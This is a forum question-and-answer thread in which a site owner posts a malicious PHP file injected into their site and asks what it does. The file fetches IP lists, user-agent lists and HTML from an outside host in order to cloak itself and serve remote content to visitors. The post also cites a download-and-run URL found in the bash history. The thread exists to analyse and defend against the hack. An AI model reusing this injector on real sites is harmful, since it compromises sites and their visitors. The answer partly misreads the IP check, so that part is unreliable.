I was just hacked, but I don't know how or more importantly, why. Very odd code injected

Question

EDIT: Good work all so far.

I've just found this being download and ran in my bash history:

http://notsoft.ru/glib

(safe to view)

Thanks all

---

I've just noticed the source php of my site has been edited. I've no idea how (I've changed all my passwords since) but what's really confuses me is why.

In a couple of pages there was a iframe placed, linking to an xml.php file which was placed in my images directory (the only directory accessible by HTACCESS. This code MUST have been hand placed as the pages are fairly complex and to auto place without braking these pages would have been near impossible.

Now the REALLY confusing thing is the contents of this XML.php file, as from what I can see it does nothing.

Here's the code:

<?php

$urlIps = "http://mp3magicmag.com/frame/ips.txt"; // Url to IP's
$urlHtml = "http://mp3magicmag.com/frame/html.code"; // Url to html.code
$urlUa = "http://mp3magicmag.com/frame/ua.txt"; // Url to User Agent file

if(isset($_GET['ping'])){
    echo "Status: Ping successful!"; die;
}
$ip = $_SERVER['REMOTE_ADDR'];
//orezaem do deapozona
$exIps = explode(".", $ip);

$ip = $exIps[0].".".$exIps[1].".".$exIps[2];

$ips = file_get_contents($urlIps);

if(strpos(" ".$ips, $ip)){ // esli nashli IP v file to ostanavlivaem process..
    die;
}

$arrUa = file($urlUa);
for($ua=0; $ua<count($arrUa); $ua++){
    $userAgent = trim($arrUa[$ua]);
    if(strpos(" ".$_SERVER['HTTP_USER_AGENT'], $userAgent)){ // esli nashli v User Agent'e to ostanavlivaem process..
        die;
    }
}


if(isset($_COOKIE['pingshell'])){ // proveriaem est' li kuki

    echo @file_get_contents($urlHtml);

}else{

?>
<SCRIPT LANGUAGE="JavaScript">
function setCookie (name, value, expires, path, domain, secure) {
      document.cookie = name + "=" + escape(value) +
    ((expires) ? "; expires=" + expires : "") +
    ((path) ? "; path=" + path : "") +
    ((domain) ? "; domain=" + domain : "") +
    ((secure) ? "; secure" : "");
}
</SCRIPT>

<SCRIPT LANGUAGE="JavaScript">
setCookie("pingshell", "12345", "Mon, 01-Jan-2099 00:00:00 GMT", "/");
</SCRIPT>
<meta http-equiv="refresh" content="2; url=">

<?php
}
?>

Am I missing something, or is this the strangest "hack" ever?? I've done my googling and can't find any reference to it happening before.

Answer 1

Right what it does is as follows.

1. Checks to see if the script was called with ping if it was it replies and terminates
2. Downloads a list of valid server IPs and checks that the request came from one, terminates if not.
3. Downloads a list of user-agent strings and matches the browser against those to see if it is valid, if not it terminates.
4. If the cookie pingshell has been set previously then the HTML file is downloaded and displayed to the browser
5. Otherwise a cookie script is sent back to the browser, setting the pingshell cookie to a dummy value, valid for the entire domain.

Step 4 is the important bit, it looks like a proxy server to retrieve the HTML at the location given. If the link is illegal, then it's not good. Probably for marketing purposes though, they can use your URL to serve their content and get your users click-through data.

Having said that the code only allows any form of access from prescribed IP addresses, so unless they are capturing that information first, seems like it is designed for specific use by specific people.